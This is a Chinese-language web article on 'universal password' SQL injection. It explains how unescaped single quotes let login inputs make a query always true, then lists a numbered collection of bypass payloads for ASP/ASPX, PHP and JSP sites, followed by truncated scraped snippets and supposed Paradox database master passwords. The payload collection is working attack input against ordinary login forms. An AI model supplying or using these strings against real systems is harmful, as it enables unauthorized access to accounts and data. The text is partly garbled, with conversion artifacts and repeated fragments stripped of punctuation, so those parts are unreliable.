【萬能密碼的原理】
使用者進行使用者名稱和密碼驗證時,**需要查詢資料庫。查詢資料庫就是執行sql語句。
針對此bbs論壇,當使用者登入時,後台執行的資料庫查詢操作(sql語句)是【select user_id,user_type,email from users where user_id=『使用者名稱』 and password=『密碼』】。
由於**後台在進行資料庫查詢的時候沒有對單引號進行過濾,當輸入使用者名稱【admin】和萬能密碼【2』or』1】時,執行的sql語句為【select user_id,user_type,email from users where user_id=『admin』 and password=『2』or』1』】。同時,由於sql語句中邏輯運算子具有優先順序,【=】優先於【and】,【and】優先於【or】,且適用傳遞性。因此,此sql語句在後台解析時,分成兩句【select user_id,user_type,email from users where user_id=『admin』 and password=『2』】和【『1』】,兩句bool值進行邏輯or運算,恒為true。sql語句的查詢結果為true,就意味著認證成功,也可以登入到系統中。
我們所常說的』or』=』or』萬能密碼的原理是這樣的:
sql語句sql=」select * from user where username=』」&username&」『and pass=』」& pass&』」 ,當我們使用者名稱和密碼都填寫』or』=』or』提交的時候,即此時語句中的username和pass都等於』or』=』or』,那麼,這條sql語句就變成了:sql=」select * from user where username=」or』 『=」and pass=」or』 『=」 ,自然也就通過了程式的驗證
我們應當注意這樣一件事情,那就是無論查詢語句怎麼寫我們所輸入的內容都是要被單引號引起來的,那麼我們現在嘗試利用這樣的特點來構造新的「萬能密碼」登入
首先我們需要在密碼的最前面有乙個單引號,來閉合sql語句中的單引號,然後構造乙個or,也就是或者,或者怎麼樣我們才能通過驗證呢?當然最簡單的就是1=1,所以由此我們構造出新的密碼:『or 『1』=』1。為什麼密碼的最後麵少了乙個單引號呢?這是同樣為了使sql語句不出錯,是來閉合程式中的sql語句的後面的單引號的,如果我們在後面再加上乙個單引號的話就會出錯了
下面附乙個萬能密碼合輯
asp aspx萬能密碼
1:」or 「a」=」a
2: 『)or(『a』=』a
3:or 1=1–
4:』or 1=1–
5:a』or』 1=1–
6:」or 1=1–
7:』or』a』=』a
8:」or」=」a』=』a
9:』or」=』
10:』or』=』or』
11: 1 or 『1』=』1』=1
12: 1 or 『1』=』1』 or 1=1
13: 『or 1=1%00
14: 「or 1=1%00
15: 『xor
16: 使用者名稱 』 union select 1,1,1 from admin where 」=』 (替換表名admin)
密碼 1
17…admin』 or 『a』=』a 密碼隨便
php萬能密碼
『or 1=1/*
user: something
pass: 』 or 『1』=』1
jsp 萬能密碼
1』or』1』=』1
admin』 or 1=1/*
萬能密碼 php,PHP萬能密碼
說實話如果乙個 的前台都是注入漏洞,那麼憑經驗,萬能密碼進後台的機率基本上是百分之百。可是有的人說對php的站如果是gpc魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了php注入。其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進php的後台。其實gpc魔術轉換是否開啟對用萬能密碼進後台一點影響也...
asp aspx php jsp萬能密碼
asp aspx萬能密碼 1 or a a 2 or a a 3 or 1 1 4 or 1 1 5 a or 1 1 6 or 1 1 7 or a a 8 or a a 9 or 10 or or 11 1 or 1 1 1 12 1 or 1 1 or 1 1 13 or 1 1 00 14 ...
PARADOX DB 萬能密碼
paradox資料庫的萬能密碼 如果是paradox,請用此萬能密碼 jiggae 還有 nx66ppx 注意大小寫 version password paradox 7 jiggae or cupcdvum paradox 5 jiggae or cupcdvum paradox 4 nx66pp...